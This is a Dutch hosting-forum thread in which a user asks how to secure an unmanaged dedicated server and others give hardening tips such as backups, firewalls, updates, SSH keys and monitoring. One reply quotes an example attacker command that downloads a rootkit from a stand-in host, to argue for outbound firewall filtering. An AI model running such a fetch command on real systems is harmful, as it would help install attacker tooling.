Likes Likes:  0
Resultaten 1 tot 15 van de 20
Pagina 1 van de 2 1 2 LaatsteLaatste
Geen

Onderwerp: Do & Don'ts (dedi)

  1. #1
    Do & Don'ts (dedi)
    geregistreerd gebruiker
    129 Berichten
    Ingeschreven
    03/04/04

    Locatie
    n.v.t.

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: n.v.t.
    Ondernemingsnummer: n.v.t.

    Thread Starter

    Do & Don'ts (dedi)

    Beste webhosters,

    Binnenkort neem ik mogelijk mijn eerste dedicated server. Deze wordt door mijn host geinstalleerd (Fedora, apache, ensim enz.) en gebruiksklaar aan mij geleverd, echter is dit wél unmanaged. Ik zou graag willen weten waar ik op moet letten bij o.a. beveiliging van de server en het instellen van de server.

    Alvast bedankt,
    Alleznet



  2. #2
    Do & Don'ts (dedi)
    a.k.a. Opa-Bullcat-
    1.182 Berichten
    Ingeschreven
    08/04/05

    Locatie
    Haarlem

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: 34223894
    Ondernemingsnummer: nvt

    Misschien een extern bedrijf inschakelen om het beheer op zich te nemen ?
    Tenminste dat heb ik ook gedaan, ja kost paar centen, maar als je gehackt word of de zaak loopt in het honderd dan ben jij en je klanten niet echt blij !

  3. #3
    Do & Don'ts (dedi)
    geregistreerd gebruiker
    699 Berichten
    Ingeschreven
    21/05/03

    Locatie
    Rotterdam

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Ik zou beginnen met een goede backup en firewall (IPTables).

    Maar zonder gekkigheid: waarom Ensim? Ik heb hier helaas teveel nare ervaringen mee gehad om je hier niet voor te waarschuwen

    Waarom Fedora Core? Wij schakelen nu over naar CentOS omdat je dan minder updates te doen hebt?

    Je hebt wel ervaring met Linux && Onderhoud?

  4. #4
    Do & Don'ts (dedi)
    geregistreerd gebruiker
    129 Berichten
    Ingeschreven
    03/04/04

    Locatie
    n.v.t.

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: n.v.t.
    Ondernemingsnummer: n.v.t.

    Thread Starter
    Ik vindt Ensim erg prettig om mee te werken, heb er nog nooit problemen mee gehad, en het is hetgeen wat mijn host levert.

    Fedora core was een foutje, is toch CentOs.

    Betreft onderhoud is dat niet mijn zorg, de server staat wat dat betreft wel onder hun beheer.

    Verder is het geen hostingbedrijf o.i.d. het is voor één website. Verder helpen de helpdeskers van het bedrijf wel gewoon altijd mee (ik zit er nu ook alleen dan virtueel), echter is het op papier voor mij.

  5. #5
    Do & Don'ts (dedi)
    geregistreerd gebruiker
    699 Berichten
    Ingeschreven
    21/05/03

    Locatie
    Rotterdam

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Origineel geplaatst door alleznet
    Ik vindt Ensim erg prettig om mee te werken, heb er nog nooit problemen mee gehad, en het is hetgeen wat mijn host levert.


    Ik helaas wel. Backup gemaakt maar niet terug te zetten. Ensim support werkt NIET in het weekend, dus dat gaf een downtime van +- 48 uur.

    Betreft onderhoud is dat niet mijn zorg, de server staat wat dat betreft wel onder hun beheer.
    Wat is je uiteindelijke vraag dan?

  6. #6
    Do & Don'ts (dedi)
    geregistreerd gebruiker
    2.003 Berichten
    Ingeschreven
    23/11/05

    Locatie
    Amsterdam en Schiphol-Rijk

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: 33304957
    Ondernemingsnummer: nvt

    Unmanaged is meestal ook echt Unmanaged, dus zonder beveiliging en andere zaken.

  7. #7
    Do & Don'ts (dedi)
    geregistreerd gebruiker
    129 Berichten
    Ingeschreven
    03/04/04

    Locatie
    n.v.t.

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: n.v.t.
    Ondernemingsnummer: n.v.t.

    Thread Starter
    Nou, de server wordt gewoon veilig (op het moment van oplevering) aan mij verhuurd. Dus op dat moment is alles (als het goed is) gewoon veilig. Echter hoe kan ik het veilig houden: ofwel, waar vind ik patches en nieuws over wat je moet aanpassen om het veilig te houden?

  8. #8
    Do & Don'ts (dedi)
    geregistreerd gebruiker
    699 Berichten
    Ingeschreven
    21/05/03

    Locatie
    Rotterdam

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    pcies, maar deze server valt wel onder hun beheer? :?

  9. #9
    Do & Don'ts (dedi)
    geregistreerd gebruiker
    653 Berichten
    Ingeschreven
    14/02/04

    Locatie
    Delft

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: X
    KvK nummer: 27284466
    Ondernemingsnummer: nvt

    Bij een verse OS installatie hoeft niet altijd de laatste updates op te zitten, vergis je hierin, niet.

    Altijd backups maken, het liefst extern.
    Een goede firewall installeren.
    Je logs goed bijhouden.

    Verder is het allemaal vanzelfsprekend, geen crappy scripts bijvoorbeeld.

    /toevoeging
    En natuurlijk niet zomaar alle updates of software installeren, het liefst eerst testen op een test-server.

  10. #10
    Do & Don'ts (dedi)
    geregistreerd gebruiker
    129 Berichten
    Ingeschreven
    03/04/04

    Locatie
    n.v.t.

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: n.v.t.
    Ondernemingsnummer: n.v.t.

    Thread Starter
    "Bij een verse OS installatie hoeft niet altijd de laatste updates op te zitten, vergis je hierin, niet."

    De hosting zorgt ervoor dat dit sowieso feilloos werkt.

    "Altijd backups maken, het liefst extern."
    Gaat zeker gebeuren, doen we nu trouwens ook al.

    "Verder is het allemaal vanzelfsprekend, geen crappy scripts bijvoorbeeld."
    Nee, liefst ga ik nog de safemode aanzetten voor een extra vorm van veiligheid

    "En natuurlijk niet zomaar alle updates of software installeren, het liefst eerst testen op een test-server."
    testen gaat niet zomaar als je maar één dedicated huurt :P

  11. #11
    Do & Don'ts (dedi)
    geregistreerd gebruiker
    129 Berichten
    Ingeschreven
    03/04/04

    Locatie
    n.v.t.

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: n.v.t.
    Ondernemingsnummer: n.v.t.

    Thread Starter
    Nog iemand tips?

  12. #12
    Do & Don'ts (dedi)
    geregistreerd gebruiker
    158 Berichten
    Ingeschreven
    16/01/05

    Locatie
    Eindhoven

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: Ja
    KvK nummer: 17151643
    Ondernemingsnummer: nvt

    Nog specifieke vragen ?

  13. #13
    Do & Don'ts (dedi)
    geregistreerd gebruiker
    653 Berichten
    Ingeschreven
    14/02/04

    Locatie
    Delft

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: X
    KvK nummer: 27284466
    Ondernemingsnummer: nvt

    Origineel geplaatst door alleznet
    "Bij een verse OS installatie hoeft niet altijd de laatste updates op te zitten, vergis je hierin, niet."

    De hosting zorgt ervoor dat dit sowieso feilloos werkt.

    "Altijd backups maken, het liefst extern."
    Gaat zeker gebeuren, doen we nu trouwens ook al.

    "Verder is het allemaal vanzelfsprekend, geen crappy scripts bijvoorbeeld."
    Nee, liefst ga ik nog de safemode aanzetten voor een extra vorm van veiligheid

    "En natuurlijk niet zomaar alle updates of software installeren, het liefst eerst testen op een test-server."
    testen gaat niet zomaar als je maar één dedicated huurt :P
    Een oude testbak thuis wellicht ? =)

  14. #14
    Do & Don'ts (dedi)
    geregistreerd gebruiker
    129 Berichten
    Ingeschreven
    03/04/04

    Locatie
    n.v.t.

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: n.v.t.
    Ondernemingsnummer: n.v.t.

    Thread Starter
    Ben momenteel bezig op een relatief nieuwe laptop centos te installeren. Ben gewoon een hoop aan het bekijken, en de verschillen vinden tussen centos en andere linux systemen.

    "Nog specifieke vragen"
    Is 'nog tips' niet specifiek genoeg? :P

  15. #15
    Do & Don'ts (dedi)
    geregistreerd gebruiker
    241 Berichten
    Ingeschreven
    24/06/03

    Locatie
    Amsterdam

    Post Thanks / Like
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: Ja
    KvK nummer: BV, 30141839
    Ondernemingsnummer: nvt

    Let inderdaad op updates, zorg ervoor dat je die regelmatig uitvoert.

    Eventueel iets als tripwire installeren

    Zorg er voor dat alle scripts (cgi/php) draaien onder uid van de klant (suexec etc)

    "ChallengeResponseAuthentication no" icm ssh keys

    verifieer backups, en probeer eens een "disaster recovery" op een compleet andere machine.

    onnodige processen/daemons uitzetten.

    Installeer een monitoring tool. (evt ook remote) om te verifieren dat daemons werken.

    Installeer sysstat (sar) en zorg dat die draait vanuit cron. (is altijd handig om terug te kijken naar sys stats)

    Zorg voor een omvattende iptables firewall, een die niet alleen inkomend verkeer filterd, maar ook uitgaand. (als een cracker via exploit geen wget http://l33t.org/r00tk1t.tar kan uitvoeren is al een goede stap)

    Zorg voor een noexec /tmp partitie. (discutabel, ok. Maar ik zie vaak genoeg dat het misbruikt wordt)

    Iets dat vrije schijfruimte etc monitord.

    Kan nog wel een tijdje doorgaan, maar er zijn veel betere en completere howto pagina's op het net.

Pagina 1 van de 2 1 2 LaatsteLaatste

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2021 Webhostingtalk.nl.
Web Statistics